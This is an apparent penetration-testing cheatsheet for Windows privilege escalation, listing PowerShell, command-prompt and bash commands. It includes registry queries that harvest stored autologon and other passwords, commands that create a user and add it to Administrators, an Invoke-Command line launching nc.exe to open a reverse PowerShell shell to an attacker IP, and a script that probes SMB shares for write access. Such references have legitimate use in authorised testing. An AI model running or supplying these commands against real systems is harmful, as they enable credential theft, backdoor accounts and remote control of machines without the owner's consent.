Windows Privilege Escalation

A cheatsheet containing a collection of useful commands.

Powershell

POSH can be a powerful tool when used correctly.

Find Passwords

Look for passwords logged for autologon:

PS> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>null | findstr "DefaultUserName DefaultDomainName DefaultPassword"

Search for keyword “password” in registry:

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

Create User

PS> New-LocalUser "<username>" -Password '<password>' -FullName "<fullname>" -Description "<account-description>"

Add User to Administrator Group

PS> Add-LocalGroupMember -Group "Administrators" -Member "<username>"

Run As User

PS> $SecPassword = ConvertTo-SecureString '<password>' -AsPlainText -Force
PS> $Creds = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<username>', $SecPassword)

Usage:

PS> Invoke-Command -ScriptBlock {C:\Windows\Temp\nc.exe <attacker-ip> <port> -e powershell} -Credential $Creds -computername <computer-name>

Searching

Find Hidden Text Files

PS> Get-ChildItem -Path C:\ -Include *.txt -Hidden -File -Recurse -force -ErrorAction SilentlyContinue

List Hidden Files

PS> dir -Force

Command prompt:

C:\> dir /adh

SMB

Check Shares For Read/Write Access

#!/bin/bash
username="<DOMAIN>\\<username>"    # Double backslash
password="<password>"        # User password
hostname="<ip-address>"     # SMB hostname of target

cd "${TMPDIR:-/tmp}"
touch tmp_$$.tmp           # Required locally to copy to target

smbclient -L "$hostname" -g -A <( echo "username=$username"; echo "password=$password" ) 2>/dev/null |
    awk -F'|' '$1 == "Disk" {print $2}' |
    while IFS= read -r share
    do
        echo "Checking root of share '$share'"

        if smbclient "//$hostname/$share/" "$password" -U "$username" -c "dir" >/dev/null 2>&1
        then
            status=READ

            # Try uprating to read/write
            if smbclient "//$hostname/$share/" "$password" -U "$username" -c "put tmp_$$.tmp ; rm tmp_$$.tmp" >/dev/null 2>&1
            then
                status=WRITE
            fi
        else
            status=NONE
        fi

        case "$status" in
            READ) echo "Yes, $username has read access" ;;
            WRITE) echo "Yes, $username has write access" ;;
            *) echo "No, $username has no access" ;;
        esac
    done

rm -f tmp_$$.tmp

Download Files From Share

curl -u '<WORKGROUP>\<username>' smb://<ip-address>/path/to/file -O

Assign Share to Drive Letter

net use z: \\<attacker-ip>\<share>